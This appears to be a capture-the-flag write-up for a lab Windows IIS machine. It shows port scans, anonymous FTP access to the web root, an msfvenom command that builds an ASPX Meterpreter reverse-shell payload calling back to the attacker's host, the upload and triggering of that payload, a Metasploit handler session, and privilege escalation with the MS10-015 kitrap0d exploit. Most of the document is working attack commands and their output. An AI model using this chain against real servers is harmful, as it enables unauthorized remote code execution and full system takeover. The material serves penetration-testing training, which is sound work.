Enumeration W/ Nmap  
nmap 10.10.10.5 -A -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-10 23:29 UTC
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 20.50% done; ETC: 23:33 (0:02:43 remaining)
Stats: 0:01:11 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 35.00% done; ETC: 23:33 (0:02:12 remaining)
Stats: 0:02:35 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 77.00% done; ETC: 23:33 (0:00:46 remaining)
Stats: 0:02:56 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 87.50% done; ETC: 23:33 (0:00:25 remaining)
Nmap scan report for 10.10.10.5
Host is up.
All 1000 scanned ports on 10.10.10.5 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.97 seconds
                                                                             
┌──(kali㉿kali)-[~]
└─$ nmap 10.10.10.5 -p-   
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-10 23:34 UTC
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 13.47% done; ETC: 23:37 (0:03:00 remaining)
Stats: 0:00:58 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 36.37% done; ETC: 23:36 (0:01:41 remaining)
Stats: 0:01:37 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 58.67% done; ETC: 23:36 (0:01:08 remaining)
Stats: 0:01:39 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 59.62% done; ETC: 23:37 (0:01:08 remaining)
Stats: 0:01:42 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 60.70% done; ETC: 23:37 (0:01:06 remaining)
Nmap scan report for 10.10.10.5
Host is up (0.056s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 173.07 seconds
                                                                             
┌──(kali㉿kali)-[~]
└─$ nmap 10.10.10.5 -p 21 -sC -O
TCP/IP fingerprinting (for OS scan) requires root privileges.
QUITTING!
                                                                             
┌──(kali㉿kali)-[~]
└─$ sudo nmap 10.10.10.15 -p 21 -sC -O
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-10 23:38 UTC
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.50 seconds
                                                                             
┌──(kali㉿kali)-[~]
└─$ sudo nmap 10.10.10.15 -p 21 -sC -O -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-10 23:38 UTC
Nmap scan report for 10.10.10.15
Host is up.

PORT   STATE    SERVICE
21/tcp filtered ftp
Too many fingerprints match this host to give specific OS details

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.96 seconds
                                                                             
┌──(kali㉿kali)-[~]
└─$ nmap 10.10.10.5 -p- -A            
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-10 23:39 UTC
Stats: 0:00:19 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 6.61% done; ETC: 23:44 (0:04:28 remaining)

                                                                             
┌──(kali㉿kali)-[~]
└─$ nmap 10.10.10.5 -p 21-80 -A 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-10 23:40 UTC
Nmap scan report for 10.10.10.5
Host is up (0.085s latency).                                                 
Not shown: 58 filtered tcp ports (no-response)                               
PORT   STATE SERVICE VERSION                                                 
21/tcp open  ftp     Microsoft ftpd                                          
| ftp-anon: Anonymous FTP login allowed (FTP code 230)                       
| 03-18-17  02:06AM       <DIR>          aspnet_client                       
| 03-17-17  05:37PM                  689 iisstart.htm                        
|_03-17-17  05:37PM               184946 welcome.png                         
| ftp-syst:                                                                  
|_  SYST: Windows_NT                                                         
80/tcp open  http    Microsoft IIS httpd 7.5                                 
| http-methods:                                                              
|_  Potentially risky methods: TRACE                                         
|_http-title: IIS7                                                           
|_http-server-header: Microsoft-IIS/7.5                                      
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
FTP - TCP 21 
I see that Anonymous loigin is enbabled on the FTP Server. 
There are two files and a directory available to us. 
ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.

ftp> ls
229 Entering Extended Passive Mode (|||49168|)
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.

ftp> get iisstart.htm
local: iisstart.htm remote: iisstart.htm
229 Entering Extended Passive Mode (|||49171|)
150 Opening ASCII mode data connection.
100% |********************************|   689       11.62 KiB/s    00:00 ETA
226 Transfer complete.
689 bytes received in 00:00 (11.59 KiB/s)
ftp> get welcome.png
local: welcome.png remote: welcome.png
229 Entering Extended Passive Mode (|||49172|)
125 Data connection already open; Transfer starting.
100% |********************************|   180 KiB  475.23 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 820 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
184946 bytes received in 00:00 (475.03 KiB/s)

Website - TCP 80
The appears to be nothing special hear. We check the files and notice they also exsist on the web server. 
Looks like the web root on a Windows host. We could run dirb on the as well, but we decide to just attack the web root being accesible via the FTP server.

Nikto Scan 
─(kali㉿kali)-[~]
└─$ nikto -h http://10.10.10.5
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.5
+ Target Hostname:    10.10.10.5
+ Target Port:        80
+ Start Time:         2022-07-11 05:38:23 (GMT0)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST

Seeing that this server is running ASP.NET means I will likely need a .aspx webshell when I get to that.
meterpreter
root@kali# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=443 -f aspx > met_rev_443.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload    
[-] No arch selected, selecting arch: x86 from the payload                                
No encoder or badchars specified, outputting raw payload                                  
Payload size: 341 bytes                                                                   
Final size of aspx file: 2838 bytes   

Upload it over ftp:

ftp> put met_rev_443.aspx
local: met_rev_443.aspx remote: met_rev_443.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2874 bytes sent in 0.00 secs (5.3532 MB/s)

Open Metasploit and start the exploit/multi/handler, which provides a listener for callbacks generated outside of Metasploit:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost tun0
lhost => 10.10.14.14
msf5 exploit(multi/handler) > set lport 443
lport => 443

msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.14      yes       The listen address (an interface may be specified)
   LPORT     443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
   
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.14:443

Now just visit the page:

root@kali# curl http://10.10.10.5/met_rev_443.aspx

[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.14:443 -> 10.10.10.5:49164) at 2019-03-05 12:09:09 -0500

meterpreter > getuid
Server username: IIS APPPOOL\Web

Privelage Escalation -Metasploit

Enumeration

msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester

msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1

msf5 post(multi/recon/local_exploit_suggester) > options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          1                yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

Using MS10-015 

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > options 

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.74.135   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf6 exploit(windows/local/ms10_015_kitrap0d) > set LhOST tun0
LhOST => tun0
msf6 exploit(windows/local/ms10_015_kitrap0d) > set lport 445
lport => 445
msf6 exploit(windows/local/ms10_015_kitrap0d) > run

oops.. forgot to set my session. 
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1

And.. we have the Authority!!!!

Devel Pwned
